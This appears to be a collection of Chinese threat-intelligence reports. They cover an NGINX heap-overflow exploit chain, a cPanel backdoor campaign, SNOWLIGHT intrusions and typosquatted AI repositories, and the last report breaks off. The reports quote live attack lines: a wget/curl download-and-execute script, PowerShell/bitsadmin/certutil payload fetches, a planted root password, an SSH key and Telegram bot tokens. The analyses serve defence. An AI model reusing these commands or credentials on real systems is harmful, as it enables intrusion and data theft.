漏洞根因位于src/http/ngx_http_script.c。当rewrite指令的替换字符串包含问号时，函数ngx_http_script_start_args_code会将主引擎的e->is_args标志设置为1：

void ngx_http_script_start_args_code(ngx_http_script_engine_t *e) {
    e->is_args = 1;
    e->args = e->pos;
    e->ip += sizeof(uintptr_t);
}

该标志在后续处理中从未被重置。当后续的set指令引用正则捕获组时，触发ngx_http_script_complex_value_code函数执行长度计算。此时，该函数创建一个完全清零的子引擎：

void ngx_http_script_complex_value_code(ngx_http_script_engine_t *e) {
    ngx_http_script_engine_t le;
    ngx_memzero(&le, sizeof(ngx_http_script_engine_t));
    le.ip = code->lengths->elts;
    // ...
}

由于子引擎被初始化为全零，le.is_args为0。长度计算函数ngx_http_script_copy_capture_len_code据此判断不需要进行URL转义，计算出的长度是原始捕获字节数。然而在实际复制阶段，主引擎的e->is_args仍为1，复制函数调用ngx_escape_uri进行URL转义，每个可转义字节扩展为3字节（%XX格式）。长度计算与实际写入数据量之间的不匹配，导致堆缓冲区溢出。

攻击向量与利用链

漏洞触发需要同时满足两个条件：rewrite指令的替换字符串包含问号，且后续存在引用捕获组的set指令。攻击者可通过构造恶意请求路径，利用截断的正则表达式捕获未转义的路径字符。

depthfirst已公开完整的概念验证代码，验证了以下攻击路径：

攻击者通过跨请求堆风水（heap feng shui）技术操控堆布局
利用POST body喷洒（spraying）破坏相邻的ngx_pool_t结构
将cleanup指针重定向至伪造的ngx_pool_cleanup_s结构
在内存池销毁时触发system()调用，获得远程shell 在Ubuntu 24.04.3 LTS环境中，该概念验证代码已验证可行。

其他关联漏洞

CVE-2026-42946：SCGI/UWSGI模块过度内存分配

SCGI和UWSGI模块在解析上游状态行时存在状态不匹配问题。当状态行读取不完整时，跨缓冲区的指针减法运算产生约1TB的键长度，导致worker进程崩溃。

CVE-2026-40701：SSL模块释放后使用

TLS连接关闭时，若异步OCSP DNS解析尚未完成，上下文池被销毁但解析器请求未被取消。后续DNS计时器回调将对已释放的内存指针进行解引用。

CVE-2026-42934：Charset模块越界读取

Charset模块在处理跨代理缓冲区边界的不完整UTF-8序列时存在off-by-one错误，导致长度状态损坏，计算出负的源偏移量，在分配的上游缓冲区前读取2字节。

APT威胁态势评估

利用可能性分析

CVE-2026-42945作为高严重性远程代码执行漏洞，具备以下APT利用特征：

漏洞成熟度：漏洞代码存在18年，利用思路清晰，公开的概念验证代码可直接适配
攻击面广泛：NGINX作为全球使用最广泛的Web服务器之一，占据约三分之一的市场份额，部署量巨大
利用门槛中等：需要特定的配置组合（rewrite含问号 + set引用捕获组），但目标配置广泛存在于API网关场景

威胁行为体关注点

国家级APT组织通常将此类基础组件漏洞作为：

Initial Access阶段：通过Web边界设备获得内网立足点
Lateral Movement载体：攻陷Web服务器后进一步横向移动至后端系统
供应链投毒潜力：若攻击者同时掌握构建环境，可进一步扩展影响范围

战术技术演变预测

根据MITRE ATT&CK框架，该漏洞利用涉及以下技术：

T1190：利用面向公众的应用组件
T1059.003：命令和脚本解释器（通过成功利用获得shell）
T1543.003：创建或修改系统进程（维持持久化）

预计后续将出现针对该漏洞的自动化利用工具，降低攻击门槛。

防护建议

紧急处置

立即统计境内部署的NGINX版本，识别0.6.27至1.30.0版本（开源版）及R32至R36版本（Plus版）的部署实例
检查现有配置中是否包含rewrite指令含问号且后续存在set指令引用捕获组的组合模式
在Web应用层之前部署WAF规则，检测异常HTTP请求路径特征

缓解措施

升级至NGINX最新稳定版本（1.30.0+），确认供应商已发布的补丁已应用
启用ASLR、DEP等系统级内存保护机制，增加利用难度
以低权限账户运行NGINX worker进程，限制成功利用后的影响范围
实施网络分段，限制Web服务器与后端关键系统的直接通信

监控策略

部署内存完整性监控工具，检测heap overflow特征行为
监控Web服务器进程异常退出和资源消耗异常
建立NGINX配置变更的完整性校验机制

结论

CVE-2026-42945代表了基础组件中长期潜伏漏洞的典型风险模式。该漏洞根因在于2008年引入的代码设计缺陷，在特定配置组合下可被触发导致堆缓冲区溢出。鉴于NGINX的广泛部署和漏洞的严重性，APT组织极有可能将其纳入武器库。

建议安全运营团队将此次披露作为优先级事件进行响应，在确认受影响资产范围后尽快推进修复工作。考虑到公开漏洞利用代码的存在，修补窗口期应尽可能压缩至72小时内。

IOC指标

类型	值	说明
CVE-2026-42945	Critical (9.2)	ngx_http_rewrite_module堆溢出
CVE-2026-42946	High (8.3)	SCGI/UWSGI模块内存分配问题
CVE-2026-40701	Medium (6.3)	ngx_http_ssl_module UAF
CVE-2026-42934	Medium (6.3)	ngx_http_charset_module越界读取
Affected Version	NGINX 0.6.27 - 1.30.0	开源版受影响范围
Affected Version	NGINX Plus R32 - R36	Plus版受影响范围

MITRE ATT&CK技术映射

ATT&CK技术	ID	说明
Exploit Public-Facing Application	T1190	利用面向Internet的Web服务器漏洞
Command and Scripting Interpreter	T1059.003	Unix Shell，用于成功利用后执行命令
Create or Modify System Process	T1543.003	持久化机制

参考来源

阅读原文

跳转微信打开

秘密活动6年的神秘黑客组织Mr_Rot13正在利用cPanel高危漏洞部署后门木马

Wed, 13 May 2026 10:01:00 +0800

奇安信X实验室 2026-05-13 10:01 北京

以下文章来源于：奇安信XLab

奇安信XLab

奇安信XLab是国内最资深利用大规模多维度数据进行大网安全平台建设，数据分析与研究及安全应用的团队之一，建立了国内首个 PassiveDNS系统，披露了30+有影响力的僵尸网络。本公众号是XLab交流技术研究成果的平台，欢迎订阅、转发、留言

XLab大网威胁感知系统持续监测到大量黑灰产组织正在积极利用CVE-2026-41940实施网络攻击，相关行为包括挖矿、勒索、僵尸网络扩散、后门植入等多种恶意活动。监测数据显示，当前已有来自全球的 2000 余个攻击源 IP 参与针对该漏洞的自动化攻击与网络犯罪活动

背景

CVE-2026-41940 是一个影响 cPanel & WHM 的高危未授权认证绕过漏洞。该产品广泛应用于 Linux 服务器运维与虚拟主机管理。漏洞 CVSS 评分高达 9.8（Critical），攻击者无需提供账号或密码，即可远程绕过身份认证并接管 cPanel / WHM 控制面板，可使未经过身份验证的远程攻击者获得受影响服务器的管理员权限。

自 2026 年 4 月 28 日漏洞公开披露以来，XLab大网威胁感知系统持续监测到大量黑灰产组织正在积极利用该漏洞实施网络攻击，相关行为包括挖矿、勒索、僵尸网络扩散、后门植入等多种恶意活动。监测数据显示，当前已有来自全球的 2000 余个攻击源 IP 参与针对该漏洞的自动化攻击与网络犯罪活动，其地域分布如下：

5月2日，安全社区披露黑客已利用该漏洞成功入侵东南亚政府及军事机构，窃取了约4.37G敏感文件的安全事件。

"In total, 110 files were stolen (~4.37GB). Files were in folders named after the years 2020, 2021, … 2024. This data was stolen in March 2026, although last referenced files from November - December 2024." -- By Ctrl-Alt-Intel

5月4日，我们在梳理通过CVE-2026-41940漏洞投递的恶意载荷过程中，发现了一个与众不同的新型感染器，该感染器采用Go语言编写，项目名称为"Payload"，其中嵌入了大量土耳其语的日志信息，疑似由AI生成。其主要功能是：向被入侵的cPanel系统植入SSH 公钥、恶意PHP、JS代码，窃取登录凭证，并将窃得的信息回传至黑客控制的Telegram群组，最终部署一个名为"filemanager"的远控木马。

在溯源分析时，我们发现本次活动的Downloader域名一个2022年上传至VirusTotal，至今依然0检测的PHP后门使用了JS代码中的相同的C2域名 wrned[.]com，这个域名早在2020年就投入使用。种种迹象表明，这些威胁的背后并不是那种"打完就跑"的投机型脚本小子，而是一个能够隐秘活动多年、至今仍未被发现的稳定黑客团体。根据创建Telegram群组时所使用的用户名（first_name）"0xWR"，以及JS代码中采用Rot13算法隐藏C2的行为，我们内部将这个神秘的黑客组织命名为Mr_Rot13。

5月4日下午，ID为"xrill_y"的用户向Mr_Rot13创建的Telegram机器人发送了一条消息，这一举动似乎打草惊蛇（当然这只是我们的解读）。次日，Mr_Rot13迅速作出反应：升级恶意样本、更换机器人令牌（bot token），并将机器人移出群组。直到5月7日，他才再次将该机器人拉回群中。目前群组中一共有3名成员，我们的技术手段无法确认他们的身份，欢迎了解内幕的朋友向我们分享更多细节。

从2020年至今的六年时间里，Mr_Rot13 的相关样本及基础设施在各安全产品中的检测率持续处于极低水平。考虑到该威胁活动仍在进行中，且涉及的 cPanel 漏洞具有高危特性，我们特撰写本威胁快讯，旨在向安全社区分享相关发现，携手共同维护网络安全。

Payload感染器

Mr_rot13通过CVE-2026-41940投递的恶意脚本如下所示，它的功能是向下载服务器 cp.dene.[de.com 请求一个名为Update的恶意载荷，并通过 nohup 命令使其在后台持续运行（通常结合 & 使用）。

F=/root/.u$$; 
(
wget -q -O "$F" 'https://cp.dene.de[.]com/Update' 2>/dev/null 
||
curl -sk -o "$F" 'https://cp.dene.de[.]com/Update'
) 
&& chmod 755 "$F" && (nohup "$F" -s >/dev/null 2>&1 &) 
&& sleep 2; rm -f "$F"

这个所谓的Update文件就是我们前文所说的Payload感染器，通过对下载URL的持续监控，一共捕获了3个版本，它们的功能相近，本文以5月5日捕获的最新版本为主要分析对象，基本信息如下所示：

MD5: fb1bc3f935fdeb3555465070ba2db33c
Magic: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
FileName: Update

Payload 感染器的功能直观且结构简单，分析难度较低。Payload感染器在运行时，若未指定 -s 或 --silent 参数，会逐项输出各类任务的执行状态。从字符串的风格来看，该感染器极有可能是攻击者直接借助 AI 生成的。

Payload感染器的主要任务是修改被入侵的系统的密码，向其植入SSH 公钥，PHP Webshell和恶意JS代码，部署filemanager远控，并将敏感的设备信息，凭证回传给黑客。

1. 修改密码 & 植入SSH 公钥

对应的处理函数分别为 main_changeRootPassword 和 main_installSSHKey。

修改ROOT密码：

root:123Qwe123C

植入SSH 公钥：

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFIswJUfqrkbm2sIMfNHZn1sOYkxjNzEynqJKFU7qoez cpanel-updater

2. 植入PHP Webshell

对应的处理函数为 main_installCpanelPy。Webshell的下载地址为 https://cp.dene.de[.]com/cpanel.py，本地路径为 /usr/local/cpanel/cgi-sys/cpanel.py。这个Webshell的名字是 Cpanel-Python，支持文件上传&浏览，以及远程命令执行等功能。

3. 注入Javascript代码

对应的处理函数为 main_injectLoginPage。从远程服务器 cp.dene.de[.]com 下载 login.js、login.tmpl，保存至 /usr/local/cpanel/base/unprotected/cpanel，用于创建自定义的登录页面。其中 login.tmpl 为模板文件，通过代码片段将 login.js 嵌入到 HTML 页面中。

而在 login.js 则通过下载代码片段实现窃取用户登录时的用户名、密码、User-Agent 以及当前 URL，并通过 AJAX 请求将这些敏感数据发送到攻击者控制的远程服务器。服务器地址 uggcf://jearq.pbz/ybt.cuc?g=3 使用 ROT13 编码，解码后为 https[:]//wrned.com/log[.]php?t=3。

4. 部署Filemanager远控

对应的处理函数为 main_runWpsockInstaller。通过代码片段构建 curl 下载命令，其中 url 指向 Filemanager 后门的安装脚本下载地址 https[:]//wpsock[.]com/cpanel/install.sh，该域名的创建时间为2021年。

install.sh 中的代码表明 Filemanager 是一个跨平台的后门，支持 Darwin、Linux、Windows 3 个主流操作系统。

5. 敏感的信息回传至C2

对应的处理函数为 main_postData。收集被入侵系统的 bash 历史记录、ssh、设备信息、数据库密码、Valiases 配置等敏感信息，回传到黑客服务器，回传接口为 https://cp.dene.de[.]com/collect.php。

6. 敏感信息回传到Telegram

对应的处理函数为 main_sendTelegram 或 main_sendTelegramFile。除了 main_postData 这种方式，Payloader 感染器还支持一条冗余的 Telegram 回传通道，接收信息的群组 ID 为 -443071772。

众所周知，使用 Telegram Bot 进行数据传递，必须配置 Token，目前一共发现以下 2 个 Token，它们对应的其实都是一个名为 "log_FatherBot" 的 bot，只不过前者已被废除：

1190043163:AAEy1FDoB_r8KFiOIqsEpgDQ2k78Ai6BdWk
1190043163:AAFtaUfpui9fqKoRnqOa5XvT6MHLcK1axiU

知道 Token 以及群组 ID 之后，我们通过 getChatAdministrators 接口发现这个群组的创建者为 0xWR，遗憾的是他的个人简介中并没有暴露更多信息。

5月4日，用户 xrill_y 使用第一个 token 向 Bot 发送了消息。Mr_rot13 迅速响应，在新样本中直接作废该 token 并启用了新 token。随后，xrill_y 似乎为了隐藏，将用户名改为 iudcbjrfv。根据现在的线索，我们无法确定 xrill_y 的真实身份，但倾向于认为他是一名安全研究人员。

Filemanager远控

Filemanager 后门是一个跨平台的远控木马，支持 Darwin、Linux、Windows 三大主流操作系统。本文以 Linux、AMD64 CPU 架构的样本为主要分析对象，它的基本信息如下所示：

MD5: 9305b4ebbb4d39907cf36b62989a6af3
MAGIC: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Name: filemanager-linux-amd64

Filemanager 支持大量参数，具体用法请参考帮助信息，本文不再逐一赘述。需特别注意的是，该工具不支持直接传递明文密码。正确的做法是：先用 -hash 参数对目标密码生成 bcrypt 哈希值，再将生成的哈希值通过 -pass-hash 参数传入。在 Shell 环境中，必须使用单引号将 bcrypt 哈希值括起来（例如 '$2a$10$...'），否则 $ 符号会被解释为变量，导致密码无效。

Filemanager 运行时监听 port 参数指定的端口，通过 Web 页面为攻击者提供远程管理被入侵系统的通道。

为了演示它的功能，我们在测试设备中启动 filemanager，并指定用户名 & 密码，端口为 9999。

此时通过浏览器访问测试设备的 9999 端口，即可进入操作页面，非常典型的远控操作台，支持文件管理，远程命令执行以及 SHELL 功能。

2022年至今0检测的PHP后门

在溯源过程中，我们发现了一个 2022 年上传到 VirusTotal、名为 helper 的 PHP 文件，该文件存在和 wrned.com 通信的行为，经过分析，我们确认它是一个 PHP 后门。

MD5: 2286f126ab4740ccf2595ad1fa0c615c
Magic: PHP script text
Name: helper.php

该文件由 2 部分组成，前部分代码来自 WordPress 系统文件 options.php，从 */ 之后为混淆的恶意代码。

混淆方式为简单的字串 xor 拼接混淆，以下面的混淆字串为例，它去混淆后为 str_rot13：

$___ = ("8" ^ "K") .("8" ^ "L") .
("8" ^ "J") .("v" ^ ")") .
("8" ^ "J") .("T" ^ ";") .
("8" ^ "L") .("W" ^ "f") .("R" ^ "a");

全文去混淆后不难看出 PHP 后门的主要逻辑为：首先向 C2 地址 https://wrned[.]com/api.php?t=3&c=1 回传触发环境下的关键参数，包括 URL、客户端 IP、参数 w 的值及 User-Agent 等。C2 响应返回一个包含 s、u、c 三个键的 JSON 对象。其中，s 用于标识当前请求在 C2 视角下是否合法；c 为 RC4 密钥，用于解密硬编码的 payload；u 用于承载额外数据，我们推测它在解密后的 payload 执行阶段被引用。

实际产生的流量如上所示，我们持续跟踪了数日，但遗憾的是，始终未从 C2 收到有效响应，因此无法解密样本中经 RC4 加密的载荷，难以进一步分析该 PHP 后门的具体功能。不过可以确定的是，WordPress 无疑是 Mr_Rot13 的重点攻击目标之一。

总结

这是目前掌握的 Mr_rot13 黑客团伙的所有情报，受限于分析视野，相关信息仍不完整，欢迎掌握更多线索的团队或个人与我们共享情报；如果您对我们的研究感兴趣，或者了解内幕消息，欢迎通过 X 平台（@Xlab_qax）与我们联系。

IOC

MD5

2286f126ab4740ccf2595ad1fa0c615c *help.php
2de27ca8d97124adaf604b18161a441e *Update
29222f5e73dd10088fcf1204aa21f87f *Update
fb1bc3f935fdeb3555465070ba2db33c *Update
45fc93426cf08f91c9f9de5f04a12263 *filemanager-darwin-amd64
711afb014f64c97d7b31685709c34ce7 *filemanager-darwin-arm64
22613c952459e65ce09fb6b5c1c03d47 *filemanager-linux-386
9305b4ebbb4d39907cf36b62989a6af3 *filemanager-linux-amd64
e49f68a363c867608972680799389daf *filemanager-linux-arm64
e1ec6ebb96cf87c785ee6a7da677c059 *filemanager-linux-armv7
02a5990b11293236e01f174f5999df20 *filemanager-windows-386.exe_
bae1f1bce7c82fa86f05b12e2e254cfc *filemanager-windows-amd64.exe_

C2

wrned[.]com

Downloader URL

https://cp.dene[.]de.com/cpanel.py
https://cp.dene[.]de.com/login.js
https://cp.dene[.]de.com/adminer.php
https://cp.dene[.]de.com/Update
https://wpsock[.]com/cpanel/install.sh
https://wpsock[.]com/cpanel/dist/filemanager-linux-386
https://wpsock[.]com/cpanel/dist/filemanager-linux-amd64
https://wpsock[.]com/cpanel/dist/filemanager-linux-armv7
https://wpsock[.]com/cpanel/dist/filemanager-linux-arm64
https://wpsock[.]com/cpanel/dist/filemanager-windows-386.exe
https://wpsock[.]com/cpanel/dist/filemanager-windows-amd64.exe
https://wpsock[.]com/cpanel/dist/filemanager-darwin-arm64
https://wpsock[.]com/cpanel/dist/filemanager-darwin-amd64

Reporter URL

https://cp.dene[.]de.com/collect.php
https://wrned[.]com/log.php

Scanner IP

178.249.209.182
149.102.229.146

Telegram Token & Channel & USER ID

Token
1190043163:AAEy1FDoB_r8KFiOIqsEpgDQ2k78Ai6BdWk (Revoked)
1190043163:AAFtaUfpui9fqKoRnqOa5XvT6MHLcK1axiU (Active)


Group
-443071772


BOT ID: 1190043163
0xWR ID: 1209569354

阅读原文

跳转微信打开

【原创】某加密IM官网供应链事件，“离岸”爱国者卷土重来

Tue, 12 May 2026 09:37:00 +0800

原创威胁情报中心 2026-05-12 09:37 北京

奇安信威胁情报中心红雨滴团队私有情报生产流程发现一家面向中文用户提供私密IM的软件官网上的安装包被替换。被替换的安装包除了正常流程外，还会释放如下组件，内存加载SNOWLIGHT下载者，最终运行魔改nps隧道。

概述

奇安信威胁情报中心红雨滴团队私有情报生产流程发现一家面向中文用户提供私密IM的软件官网上的安装包被替换，下载信息如下：

字段名称 (Field)	详细信息 (Details)
Referrer	hxxps:// www.sXXXit.com/(官方网站) https://www.sXXXXchat.com/ (官方网站)
Download URL	https://XXXXsu.oss-cn-beijing.aliyuncs.com/XX_pc.exe (官方URL路径)
Malware MD5	df3bd55c46adbf13ae68b5a9b1da19a0

被替换的安装包除了正常流程外，还会释放如下组件，内存加载SNOWLIGHT下载者，最终运行魔改nps隧道。

天擎高级威胁引擎可以对落地木马进行拦截：

SNOWLIGHT分析以及事件披露

SNOWLIGHT最早由Mandiant于2024年初披露^[1]，归属于UNC5174。奇安信威胁情报中心则是在2024年底CSDN事件^[2]的后续组件中观察到了SNOWLIGHT内存加载Vshell的情况，但并没有对外公开。直到2025年发布《Operation(润)RUN》^[3]对UNC5174进行了明确的定性。

SNOWLIGHT支持linux和windows双平台，协议上支持http、https、websocket、QUIC等协议。

Win平台事件

内网渗透

Win平台下的活动分为两类，一类通过sqlserver爆破和主流web组件漏洞入侵边界windows服务器，通过执行bitsadmin或者curl下载并执行BAT类型的SNOWLIGHT：

BAT脚本下载golang或C++版本的SNOWLIGHT:

C++编译的SNOWLIGHT如下:

不同的渗透阶段SNOWLIGHT加载的payload有所不同，在《Operation(润)RUN》^[3]一文中提到SNOWLIGHT回连内网节点的情况，在2026年初我们在媒体行业观察到了相同的案例，攻击者在目标内网的服务器区通过反向代理建立了多个SNOWLIGHT节点，并在横向移动过程中请求内网节点下载BAT类型的SNOWLIGHT：

Cmd
cmd.exe" /c EXEC xp_cmdshell 'powershell -nop -w hidden -c "$client = New-Object System.Net.WebClient; $client.DownloadFile(''http://172.XX.XXX9:38087/swt'', ''C:\Users\Public\run.bat''); Start-Process C:\Users\Public\run.bat"';
bitsadmin /transfer myjob /download /priority high http://172.XX.X.189:38087/swt C:\Users\Public\run.bat
certutil.exe -urlcache -split -f "http://172.XX.XX.24:8881/?h=172.XX.XX.24&p=8881&t=tcp&a=w64&stage=true" "C:\Users\Public\858f6b86tcp.exe"

内网SNOWLIGHT节点返回的banner信息如下：

经过分析攻击者通过SNOWLIGHT下载的payload类型如下：

文件名	类型
chr.exe	浏览器窃密插件
fs.exe	Fscan内网扫描器
rrq.exe	提权工具
sanforV.exe	SharpWeb窃密工具

涉及的PDB如下：

PDB
D:\项目\武器化\内存加载PE\x64\Release\内存加载PE.pdb
D:\soft1\soft\浏览器dump\SharpWeb-main - 副本\SharpWeb-main\SharpWeb\obj\Debug\SharpWeb.pdb

鱼叉邮件

通过lnk钓鱼的方式启动SNOWLIGHT:

Lnk
XXXXXX技术学院机房项目&.pdf.lnk
targetcmd
C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler ".\__MACOSA\__MACOSA\__MACOSA\__MACOSA\__MACOSA\__MACOSA\a.exe

随后内存加载开源项目SharpHunter，收集运维终端本机信息：

并给SNOWLIGHT创建计划任务：

Cmd
schtasks /create /tn "奇安信天擎安全浏览器服务" /tr "\"C:\Program Files\奇安信天擎安全浏览器\TQSecurityExplorer.exe\"" /sc onstart /ru

供应链水坑/仿冒水坑

除了本次披露的IM官网供应链之外，其还在仿冒一些私密IM官网，该活动可能与博彩业务有关。

以本次供应链落地的木马为例，polymorphism.exe 运行后会读取 config.dat 并在内存中解密执行，经分析为4KB大小shellcode态的SNOWLIGHT。

连接 18.179.119.184:80 下载后续载荷。

最终载荷为魔改的npm隧道，配置文件如下：

Linux平台事件

Linux平台下针对AI类型的服务器通过爆破和漏洞作为攻击入口启动反弹shell后下载bash类型的SNOWLIGHT脚本。

下载elf类型的SNOWLIGHT，最终内存加载魔改npm隧道。

总结

目前，基于奇安信威胁情报中心的威胁情报数据的全线产品，包括奇安信威胁情报平台（TIP）、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等，都已经支持对此类攻击的精确检测。

IOC

FileHash-MD5:

df3bd55c46adbf13ae68b5a9b1da19a0

f7e32bac29d48021903a62e3c64ca84b

45fec0b0e4c8b99a9719a9f153272494

6c0b5793bf6074de94c13c23225573bd

b7b85cd03240cc51038adb027702ee22

3720be773080e5ba3a366c90ba7513b8

C2:

18.179.119.184:80

参考链接

[1].https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect

[2].https://mp.weixin.qq.com/s/qQw1DXE25Gkz_P8pEPVaHg

[3].https://ti.qianxin.com/blog/articles/operation-run-the-cyber-carnival-of-offshore-patriots-cn/

点击阅读原文至ALPHA 9.3

即刻助力威胁研判

阅读原文

跳转微信打开

Hugging Face惊现供应链投毒：仿冒OpenAI仓库窃取开发者敏感数据

Mon, 11 May 2026 10:36:00 +0800

原创威胁情报中心 2026-05-11 10:36 北京

2026年5月7日，安全研究机构 HiddenLayer 披露了一起针对 AI 开发社区的供应链投毒攻击事件。攻击者在 Hugging Face 平台创建恶意仓库 Open-OSS/privacy-filter，通过 typosquatting 技术冒充 OpenAI 官方 "Privacy Filter" 项目，成功进入平台趋势榜榜首位置

事件概述

2026年5月7日，安全研究机构 HiddenLayer 披露了一起针对 AI 开发社区的供应链投毒攻击事件。攻击者在 Hugging Face 平台创建恶意仓库 Open-OSS/privacy-filter，通过 typosquatting 技术冒充 OpenAI 官方 "Privacy Filter" 项目，成功进入平台趋势榜榜首位置。该仓库在被清除前累计获得约 244,000 次下载，成为开源 AI 平台历史上最严重的大规模恶意软件分发事件之一。

此次攻击的核心 payload 为基于 Rust 语言开发的 Sefirah 信息窃取木马，具备完整的反分析能力和广泛的数据窃取范围。受害者的浏览器凭据、加密货币钱包、Discord 令牌、SSH/VPN 凭证等敏感数据均面临泄露风险。攻击活动与 npm 平台 typosquatting 攻击存在基础设施重叠，表明威胁行为体正在跨平台构建规模化攻击能力。

攻击技术分析

初始访问：Typosquatting 与信任滥用

攻击者采用经典的 typosquatting 技术，在 Hugging Face 平台注册与合法项目名称高度相似的仓库名 Open-OSS/privacy-filter，冒充 OpenAI 官方发布的 Privacy Filter 项目。攻击者几乎逐字复制了原始项目的模型卡片（Model Card）内容，使用虚假但看似可信的项目文档建立欺骗性。

攻击者进一步通过自动化脚本生成大量虚假账户，对恶意仓库进行 "star" 操作，人为提升其在趋势榜单的排名。在社交工程手段的推动下，该仓库短暂登上 趋势榜榜首，借助平台公信力进一步扩大传播范围。研究人员分析发现，约 667 个点赞账户中的绝大多数为自动生成的虚假账户，用于制造社区认可的假象。

感染链：多阶段 Payload 投递

恶意仓库采用四阶段感染链完成初始访问到最终 payload 部署的全过程。

第一阶段：loader.py

仓库中的 loader.py 文件被设计为看起来像正常的 AI 相关代码，但实际执行以下恶意行为：

禁用 SSL 证书验证，绕过安全连接保护
从远程服务器获取 base64 编码的 URL
解码后访问外部资源获取 JSON 格式的 PowerShell 命令

第二阶段：PowerShell 命令执行

解码后的 PowerShell 命令在隐藏窗口中执行，下载批处理文件 start.bat 并执行权限提升操作。

第三阶段：start.bat

该批处理文件完成以下关键步骤：

静默添加最终 payload 到 Microsoft Defender 排除列表
下载最终有效载荷 sefirah
以提升的权限执行窃密木马

第四阶段：Sefirah 窃密木马

最终 payload 为基于 Rust 语言编译的 Sefirah 信息窃取器，具备以下数据窃取能力：

目标类别	具体数据类型
浏览器数据	Chromium/Gecko 内核浏览器的 Cookie、保存的密码、加密密钥、浏览历史、会话令牌
即时通讯	Discord 令牌、本地数据库、主密钥
加密货币	加密货币钱包及浏览器扩展
远程访问	SSH、FTP、VPN 凭证及配置文件（含 FileZilla）
敏感文件	本地敏感文件及钱包种子/密钥
系统信息	完整系统信息、屏幕截图

反分析机制

Sefirah 恶意软件集成多层反分析能力，用于规避安全研究人员和自动化分析系统的检测：

虚拟机检测：识别 VMware、VirtualBox、QEMU 等虚拟化环境
沙箱检测：识别主流沙箱平台的行为特征
调试器检测：检测调试器附加行为和断点设置
分析工具检测：识别 Wireshark、Procmon 等分析工具的运行状态

该恶意软件仅在确认为真实受害者环境后才会完整执行恶意行为，这种选择性执行策略显著增加了安全分析的难度。

数据外泄

窃取的数据经过压缩后通过 HTTP 协议外泄至 C2 服务器 recargapopular[.]com。

C2 基础设施分析

根据关联分析，C2 域名 recargapopular.com 的基础信息如下：

属性	详情
注册时间	2026-02-16
到期时间	2027-02-16
注册商	TUCOWS.COM, CO.
名称服务器	deborah.ns.cloudflare.com / west.ns.cloudflare.com
当前解析 IP	172.67.165.218 / 104.21.66.235
安全状态	未见公开恶意标记

该域名于攻击事件前约三个月注册，使用 Cloudflare 名称服务器隐藏真实基础设施。注册时间与攻击活动时序的高度相关性表明，这是一次有预谋的基础设施部署。C2 服务器通过 Cloudflare CDN 节点中转，显著增加了溯源难度。

威胁归因

HiddenLayer 研究人员发现此次攻击与 npm typosquatting 活动存在直接关联。攻击者使用相同的 loader 基础设施分发 WinOS 4.0 植入程序，表明同一威胁行为体正在多个开源生态系统同步运营。

关键归因线索：

基础设施重叠：loader.py 脚本与 npm 恶意包的代码结构高度相似
TTP 一致性：两起攻击采用相同的 C2 通信模式和数据外泄格式
时间关联：活动间隔符合同一操作团队的运营节奏

此次攻击活动体现了现代网络犯罪的组织化特征：攻击者具备跨平台运营能力，能够根据不同平台特点调整投递策略，同时维护底层基础设施的统一性。

MITRE ATT&CK 映射

战术阶段	技术编号	技术名称
初始访问	T1661	钓鱼攻击（通过社会工程实现）
初始访问	T1526	供应链攻陷
持久化	T1547.001	引导登录完成时自启动（添加 Defender 排除列表）
防御规避	T1562.001	禁用安全工具（禁用 SSL 验证）
防御规避	T1562.001	添加安全工具排除项
防御规避	T1497.001	虚拟机/沙箱检测
凭证访问	T1555.003	浏览器凭证窃取
凭证访问	T1552.001	凭据文件未保护存储
凭证访问	T1552.004	私钥窃取
发现	T1592.004	收集受害者主机信息
数据外泄	T1041	通过 C2 信道外泄数据

防御建议

对于已下载该恶意仓库内容的用户，奇安信威胁情报中心建议采取以下响应措施：

系统重置：立即重新映像受感染主机，确保恶意 payload 及持久化机制被完全清除
凭证轮换：轮换所有存储在受影响系统中的密码、API 密钥、SSH 密钥
加密资产保护：更换所有加密货币钱包，废弃相关种子短语和私钥
会话失效：使所有浏览器会话令牌失效，重置双因素认证凭证
日志审计：审查近期的登录活动，识别是否存在异常访问行为

对于 AI 开发社区，我们建议：

在安装任何第三方模型前，验证仓库的官方来源和发布者身份
启用仓库的签名验证功能，验证代码完整性
避免依赖下载量作为信任依据，该指标可被人为操纵
在隔离环境（如沙箱虚拟机）中测试新获取的模型和代码

结论

此次事件是开源 AI 生态系统面临供应链攻击风险的典型案例。Hugging Face 作为全球领先的 AI 模型托管平台，每日承载大量模型分发任务，其信任机制被攻击者利用进行大规模恶意软件传播。Sefirah 窃密木马的技术成熟度和反分析能力表明，攻击者已具备开发高质量攻击工具的专业能力。

跨平台攻击活动的发现进一步揭示了当前威胁格局的演变趋势：攻击者不再局限于单一平台，而是在多个开源生态系统中建立持续性存在，利用各平台的安全盲区实现攻击规模的扩大化。

参考来源

https://www.bleepingcomputer.com/news/security/fake-openai-repository-on-hugging-face-pushes-infostealer-malware/

阅读原文

跳转微信打开

AI软件仿冒攻击再现，DeepSeek TUI成伪装诱饵

Sat, 09 May 2026 13:12:00 +0800

原创红雨滴团队 2026-05-09 13:12 北京

奇安信威胁情报中心监测到，攻击者趁着DeepSeek TUI项目热度上升，开始混水摸鱼，在Github上构造仿冒仓库，投递恶意软件。

概述

开源项目DeepSeek TUI是一个为DeepSeek大模型创造的在终端中运行的编码智能体，近期随着DeepSeek v4的发布和开发者Hunter Bown的中文扩散帖，让该项目吸引到大量关注。

奇安信威胁情报中心监测到，攻击者趁着DeepSeek TUI项目热度上升，开始混水摸鱼，在Github上构造仿冒仓库，投递恶意软件。下图中第一个是真正的DeepSeek TUI项目仓库，第二个是仿冒仓库。

恶意软件特征与我们3月披露的仿冒OpenClaw的攻击样本一致[1]，并且使用的恶意域名与国外安全厂商近期发布的报告重叠[2]，表明此类伪装成AI产品的恶意软件攻击活动持续不断，且不停更换仿冒对象。

详细分析

恶意软件存放在伪造仓库的Releases页面中，不久前才上传。

下载的7z压缩包中包含的EXE文件信息如下。

文件名	DeepSeek-TUI_x64.exe
MD5	b96c0d609c1b7e74f8cb1442bf0b5418
编译时间	2026-04-29 08:53:41 UTC

样本的属性信息如下。

（一）运行环境检测

